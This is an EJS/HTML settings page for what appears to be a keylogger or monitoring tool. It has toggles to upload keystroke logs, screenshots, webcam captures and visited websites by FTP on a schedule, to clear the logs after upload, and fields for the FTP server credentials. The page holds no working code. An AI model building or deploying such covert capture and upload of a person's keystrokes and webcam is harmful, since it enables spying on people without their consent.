<!DOCTYPE html>
<html lang="en">
<% include css/ftpCss %>

    <body>
        <div class="content">
            <% include common/commonNavbar %>
                <form action="/ftp" method="post">
                    <div class="container">
                        <nav class="mt-5">
                            <div class="nav nav-tabs" id="nav-tab" role="tablist">
                                <a class="nav-item nav-link active" id="nav-general-tab" data-toggle="tab" href="#nav-general" role="tab" aria-controls="nav-general"
                                    aria-selected="true">General</a>
                                <a class="nav-item nav-link" id="nav-settings-tab" data-toggle="tab" href="#nav-settings" role="tab" aria-controls="nav-settings"
                                    aria-selected="false">Settings</a>
                            </div>
                        </nav>
                        <div class="col-md-12">
                            <div class="tab-content" id="nav-tabContent">
                                <div class="tab-pane fade show active" id="nav-general" role="tabpanel" aria-labelledby="nav-general-tab">
                                    <div class="offset-md-2">
                                        <div class="col-md-12 mb-4">
                                            <table class="mt-4">
                                                <tbody>
                                                    <tr>
                                                        <td>
                                                            <i class="fas fa-upload icon-settings"></i>
                                                        </td>
                                                        <td class="pt-single-text">
                                                            <a data-toggle="collapse" href="#txtEnable">
                                                                Try to send logs by FTP every
                                                            </a>
                                                        </td>
                                                        <td class="pr-2 ml-5" style="float: right">
                                                            <label class="switch">
                                                                <input type="checkbox" name="enableFTP" id="enableFTP">
                                                                <span class="slider"></span>
                                                            </label>
                                                        </td>
                                                    </tr>
                                                    <tr>
                                                        <td colspan="3">
                                                            <div class="collapse" id="txtEnable">
                                                                <div class="multi-text">
                                                                    <div class="pr-2">
                                                                        hours
                                                                    </div>
                                                                    <div class="form-group pr-2">
                                                                        <input type="text" class="form-control" name="hoursFTP" id="hoursFTP" aria-describedby="helpId" size="5">
                                                                    </div>
                                                                    <div class="pr-2">
                                                                        minutes
                                                                    </div>
                                                                    <div class="form-group pr-2">
                                                                        <input type="text" class="form-control" name="minutesFTP" id="minutesFTP" aria-describedby="helpId" size="5">
                                                                    </div>
                                                                </div>
                                                            </div>
                                                        </td>
                                                    </tr>
                                                    <tr>
                                                        <td>
                                                            <i class="fas fa-file icon-settings"></i>
                                                        </td>
                                                        <td class="pt-single-text">
                                                            Upload text logs (keystroke)
                                                        </td>
                                                        <td class="pr-2 ml-5" style="float: right">
                                                            <label class="switch">
                                                                <input type="checkbox" name="enableUploadKeystroke" id="enableUploadKeystroke">
                                                                <span class="slider"></span>
                                                            </label>
                                                        </td>
                                                    </tr>
                                                    <tr>
                                                        <td>
                                                            <i class="far fa-image icon-settings"></i>
                                                        </td>
                                                        <td class="pt-single-text">
                                                            Upload visual logs (Image)
                                                        </td>
                                                        <td class="pr-2 ml-5" style="float: right">
                                                            <label class="switch">
                                                                <input type="checkbox" name="enableUploadImage" id="enableUploadImage">
                                                                <span class="slider"></span>
                                                            </label>
                                                        </td>
                                                    </tr>
                                                    <tr>
                                                        <td>
                                                            <i class="fas fa-video icon-settings"></i>
                                                        </td>
                                                        <td class="pt-single-text">
                                                            Upload Webcam
                                                        </td>
                                                        <td class="pr-2 ml-5" style="float: right">
                                                            <label class="switch">
                                                                <input type="checkbox" name="enableUploadWebcam" id="enableUploadWebcam">
                                                                <span class="slider"></span>
                                                            </label>
                                                        </td>
                                                    </tr>
                                                    <tr>
                                                        <td>
                                                            <i class="fas fa-globe icon-settings"></i>
                                                        </td>
                                                        <td class="pt-single-text">
                                                            Upload Website
                                                        </td>
                                                        <td class="pr-2 ml-5" style="float: right">
                                                            <label class="switch">
                                                                <input type="checkbox" name="enableUploadWebsite" id="enableUploadWebsite">
                                                                <span class="slider"></span>
                                                            </label>
                                                        </td>
                                                    </tr>
                                                    <tr>
                                                        <td>
                                                            <i class="fas fa-ban icon-settings"></i>
                                                        </td>
                                                        <td class="pt-single-text">
                                                            <a data-toggle="collapse" href="#txtSizeUpload">
                                                                Size upload
                                                            </a>
                                                        </td>
                                                        <td class="pr-2 ml-5" style="float: right">
                                                            <label class="switch">
                                                                <input type="checkbox" name="enableLimit" id="enableLimit">
                                                                <span class="slider"></span>
                                                            </label>
                                                        </td>
                                                    </tr>
                                                    <tr>
                                                        <td colspan="3">
                                                            <div class="collapse" id="txtSizeUpload">
                                                                <div class="multi-text">
                                                                    <div class="pr-2">
                                                                        Upload only when the logs size is more
                                                                    </div>
                                                                    <div class="form-group pr-2">
                                                                        <input type="text" class="form-control" name="limitFTP" id="limitFTP" aria-describedby="helpId" size="5">
                                                                    </div>
                                                                    <div>
                                                                        KBs
                                                                    </div>
                                                                </div>
                                                            </div>
                                                        </td>
                                                    </tr>
                                                    <tr>
                                                        <td>
                                                            <i class="fa fa-trash icon-settings"></i>
                                                        </td>
                                                        <td class="pt-single-text">
                                                            Clear the logs after successful uploading
                                                        </td>
                                                        <td class="pr-2 ml-5" style="float: right">
                                                            <label class="switch">
                                                                <input type="checkbox" name="enableClear" id="enableClear">
                                                                <span class="slider"></span>
                                                            </label>
                                                        </td>
                                                    </tr>
                                                    <tr>
                                                        <td>
                                                            <i class="fas fa-upload icon-settings"></i>
                                                        </td>
                                                        <td class="pt-single-text">
                                                            Use passive mode
                                                        </td>
                                                        <td class="pr-2 ml-5" style="float: right">
                                                            <label class="switch">
                                                                <input type="checkbox" name="enablePassive" id="enablePassive">
                                                                <span class="slider"></span>
                                                            </label>
                                                        </td>
                                                    </tr>
                                                    <tr>
                                                        <td colspan="3">
                                                            <div class="offset-md-5 pt-4">
                                                                <button type="submit" class="btn btn-success btn-lg">OK</button>
                                                                <button type="button" class="btn btn-danger btn-lg">
                                                                    <a class="cancel" href="/ftp">Cancel</a>
                                                                </button>
                                                            </div>
                                                        </td>
                                                    </tr>
                                                </tbody>
                                            </table>
                                        </div>
                                    </div>
                                </div>
                                <div class="tab-pane fade" id="nav-settings" role="tabpanel" aria-labelledby="nav-settings-tab">
                                    <div class="offset-md-3">
                                        <div class="col-md-10">
                                            <table class="mt-4">
                                                <tbody>
                                                    <tr>
                                                        <td class="pr-2">
                                                            Hostname
                                                        </td>
                                                        <td class="pt-single-text">
                                                            <div class="form-group pr-2">
                                                                <input type="text" class="form-control" name="hostnameFTP" id="hostnameFTP" aria-describedby="helpId" size="50">
                                                            </div>
                                                        </td>
                                                    </tr>
                                                    <tr>
                                                        <td class="pr-2">
                                                            Username
                                                        </td>
                                                        <td class="pt-single-text">
                                                            <div class="form-group pr-2">
                                                                <input type="text" class="form-control" name="userFTP" id="userFTP" aria-describedby="helpId" size="50">
                                                            </div>
                                                        </td>
                                                    </tr>
                                                    <tr>
                                                        <td class="pr-2">
                                                            Password
                                                        </td>
                                                        <td class="pt-single-text">
                                                            <div class="form-group pr-2">
                                                                <input type="text" class="form-control" name="passwordFTP" id="passwordFTP" aria-describedby="helpId" size="50">
                                                            </div>
                                                        </td>
                                                    </tr>
                                                    <tr>
                                                        <td class="pr-2">
                                                            Location
                                                        </td>
                                                        <td class="pt-single-text">
                                                            <div class="form-group pr-2">
                                                                <input type="text" class="form-control" name="remoteDirFTP" id="remoteDirFTP" aria-describedby="helpId" size="50">
                                                            </div>
                                                        </td>
                                                    </tr>
                                                    <tr>
                                                        <td colspan="2">
                                                            <div class="offset-md-4 mt-4">
                                                                <button type="submit" class="btn btn-success btn-lg">OK</button>
                                                                <button type="button" class="btn btn-danger btn-lg">
                                                                    <a class="cancel" href="/ftp">Cancel</a>
                                                                </button>
                                                            </div>
                                                        </td>
                                                    </tr>
                                                </tbody>
                                            </table>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </form>
        </div>
        <% include common/commonFooter %>
            <% include script/ftpScript%>
    </body>

</html>